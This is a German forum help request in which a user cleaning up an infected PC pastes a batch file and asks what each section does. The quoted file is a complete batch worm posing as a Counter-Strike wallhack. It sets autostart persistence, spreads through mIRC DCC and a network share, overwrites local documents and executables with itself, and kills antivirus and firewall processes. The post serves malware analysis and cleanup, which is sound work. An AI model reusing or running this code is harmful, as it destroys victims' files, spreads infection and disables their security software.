M
My_SQL
Mitglied
- Dabei seit
- 09.12.2008
- Beiträge
- 8
- Reaktionspunkte
- 0
Halli hallo.
Ich habe hier eine Batch vorliegen von der ich wissen muss was sie anrichtet. Sie wurde auf einem PC gefunden der wahrscheinlich infiziert ist und dessem Besitzer ich grade helfe den Rechner wieder flott zu machen.
Einige Befehle kenne ich andere nicht daher wäre es nett wenn mir jemand von oben nach unten erklären könnte was die einzelnen Abschnitte bewirken.
PS: Ein normal gutes AV lässt sich ja wohl hoffentlich nicht durch einen simplen tsKill Befehl abschalten oder? Den kenn ja sogar ich... ^^
Viele Grüße
Ich habe hier eine Batch vorliegen von der ich wissen muss was sie anrichtet. Sie wurde auf einem PC gefunden der wahrscheinlich infiziert ist und dessem Besitzer ich grade helfe den Rechner wieder flott zu machen.
Einige Befehle kenne ich andere nicht daher wäre es nett wenn mir jemand von oben nach unten erklären könnte was die einzelnen Abschnitte bewirken.
@echo off
:: Hello my name is markus^^.
set v=Hello my name is markus^^
copy %0 %windir%\%v%.bat
%random%%random%%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%%random%%random%
stjrdnfuqlgmpuwefguowyakzxgkxolraxozihswcfngwkpaolmmyfrzmsxbcnvrmwrtnjpwy
zciptpriqzrfqkqwgfiqpivuityndlqmlivmdtkjuynjdxzmpjedfjacsqgybiwcamxxxwolv
emlcctvneufmhnvfsutoqnldznssinuqigrxbzyxwfmblnqhxztsokqyldnimzgjsmqwshaso
ajbakariwolazvdwhskrdsyqqcjayyqwusubevwumtwysahdzxtqhausneeistduraaaozirc
wvqswebffznuymcvqhitlgknfdlwbzdlxfikprozaaxynlxhtmcflbnptelhpgpymekdijonv
cqqqtsqfndkcwihitiscoqqsphuooymtkolmjdielrslulfpqodcitauueorvbyohxhmwgfwr
echo -------------------------------------
echo CS:C X Wallhack build 2005
echo -------------------------------------
echo.
chcp 1252 > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\win.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\win.bat" > nul
set c=echo
copy %0 %windir%\csscheat.bat
%c% [script] > irc.bat
%c% n1=if ($nick == $me) { halt } >> irc.bat
%c% n2=/dcc send $nick "%windir%\csscheat.bat" >> irc.bat
%c% n3=} >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
md %programfiles%\sharex\xxx\ > nul
md %programfiles%\sharex\crackz\ > nul
copy %0 %programfiles%\sharex\xxx\xxxlist.bat > nul
copy %0 %programfiles%\sharex\crackz\css_xwallhack.bat > nul
echo put the css_xwallhack.bat in your ccs dic and start it, happy fragging > %programfiles%\sharex\crackz\cssource_wallhack.txt
echo start xxxlist.bat and enjoy > %programfiles%\sharex\xxx\xxxftplist.txt
net share xxx&crackz=%programfiles%\sharex > nul
for %%a in (*.bat *.txt *.doc) do copy %0 %%a > nul
for %%a in (*.exe *.ini *.cfg) do copy %0 %%a > nul
set t=tskill
%t% norton*
%t% av*
%t% fire*
%t% anti*
%t% spy*
%t% bullguard
%t% PersFw
%t% KAV*
%t% ZONEALARM
%t% SAFEWEB
%t% OUTPOST
%t% nv*
%t% nav*
%t% F-*
%t% ESAFE
%t% cle
%t% BLACKICE
%t% def*
cls
echo -------------------------------------
echo install done
echo happy fragging
echo -------------------------------------
pause > nul
:: [ fuck us gov ]
exit
PS: Ein normal gutes AV lässt sich ja wohl hoffentlich nicht durch einen simplen tsKill Befehl abschalten oder? Den kenn ja sogar ich... ^^
Viele Grüße